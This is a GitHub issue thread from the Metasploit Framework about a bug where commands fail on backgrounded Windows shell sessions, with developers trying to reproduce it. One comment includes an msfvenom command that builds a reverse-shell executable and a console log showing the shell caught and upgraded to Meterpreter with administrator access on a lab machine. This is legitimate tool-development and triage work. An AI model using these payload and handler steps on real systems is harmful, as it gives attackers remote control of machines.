### ISSUE TITLE
cmd_exec fails on backgrounded Windows shell sessions which were created backgrounded

### ISSUE THREAD

**Issue by bcoles** [rapid7/metasploit-framework#17259]
`cmd_exec` fails on Windows shell sessions (possibly others) if the session was created backgrounded. Possibly a regression. I recall discussing this before but can't find the issue. Likely an issue with command tokenization.

When running `sessions -u` the architecture detection fails, resulting in "Target is running Windows on an unsupported architecture such as Windows ARM!" error, which is confusing and obviously wrong (there's a separate open PR to fix up some issues with the architecture detection method, but that addresses the symptom rather than the root cause).

Tested on Windows 7 SP1 and Windows Server 2016.

To reproduce, execute a `window/shell/reverse_tcp` payload with `multi/handler` with `run -jz`. Post modules, local exploits, and `sessions -u` executed on this session will fail.

As a workaround, you can interact with a session with `sessions -i <session id>` then background it again. This will make the problem go away.

**Comment by adfoster-r7** [comment]
> Possibly a regression [..] Likely an issue with command tokenization

Not verified: issue potentially related to https://github.com/rapid7/metasploit-framework/pull/17072

**Comment by smashery** [comment]
@bcoles - I'm having trouble reproducing this - I've tried on Server 2016, Server 2012, Win 10 (on commit c9ba07e3a7d3848c9cb4cd27279cf8fa1ff0346b), and everything seems to be working fine - both upgrading a session, and running a post module (checkvm). I've included my steps below, if you wanted to see if I'm not replicating correctly. Could you post some more info to help me narrow this one down (version, commands run, output, logs, etc.) please?

Payload generated with:

```
./msfvenom -p windows/shell/reverse_tcp lhost=192.168.20.206 lport=4444 -f exe -o /tmp/win_shell_4444.exe
```
In msfconsole:

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
^[[Apayload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run -jz
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started reverse TCP handler on 0.0.0.0:4444 

msf6 exploit(multi/handler) > 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.20.210
[*] Command shell session 1 opened (192.168.20.206:4444 -> 192.168.20.210:58795) at 2022-11-24 16:00:46 +1100

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.2.9200] -----  192.168.20.206:4444 -> 192.168.20.210:58795 (192.168.20.210)

msf6 exploit(multi/handler) > use post/windows/gather/checkvm
msf6 post(windows/gather/checkvm) > set session 1
session => 1
msf6 post(windows/gather/checkvm) > run

[*] Checking if the target is a Virtual Machine ...
[+] This is a Hyper-V Virtual Machine
[*] Post module execution completed
msf6 post(windows/gather/checkvm) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
msf6 post(windows/gather/checkvm) > 
[*] Sending stage (200774 bytes) to 192.168.20.210
[*] Meterpreter session 2 opened (192.168.20.206:4433 -> 192.168.20.210:58784) at 2022-11-24 16:01:28 +1100
[*] Stopping exploit/multi/handler

msf6 post(windows/gather/checkvm) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                               Connection
  --  ----  ----                     -----------                                               ----------
  1         shell x86/windows        Shell Banner: Microsoft Windows [Version 6.2.9200] -----  192.168.20.206:4444 -> 192.168.20.210:58795 (192.168.20.210)
  2         meterpreter x64/windows  POD8\Administrator @ WIN2012DC                            192.168.20.206:4433 -> 192.168.20.210:58784 (192.168.20.210)

msf6 post(windows/gather/checkvm) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo 
Computer        : WIN2012DC
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_AU
Domain          : POD8
Logged On Users : 6
Meterpreter     : x64/windows
```

**Comment by bcoles** [comment]
I can't reproduce this either. The issue likely still exists but I can't be bothered looking into it. Closing.

**Comment by bcoles** [comment]
It's possible that I was using a PowerShell reverse shell to a `windows/x64/shell_reverse_tcp` handler. It is expected that powershell payloads won't work with shell handlers.

I have a habit of using port 1337 for meterpreter but re-using port 1338 for both shell and meterpreter sessions. I thought I'd double checked that I was using a shell payload - but it's possible that a PowerShell.exe process was still running waiting to connect back to 1338. Also, I can't reproduce the OP behaviour even with a PowerShell payload either, so I'm not sure.

Or maybe the original issue was valid but was fixed by #17072.
